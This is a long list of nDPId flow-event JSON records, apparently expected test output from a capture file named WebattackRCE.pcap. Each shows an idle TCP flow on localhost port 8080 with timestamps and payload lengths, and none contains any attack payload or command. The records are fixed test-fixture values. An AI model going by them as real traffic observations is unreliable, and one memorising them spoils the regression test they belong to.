-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 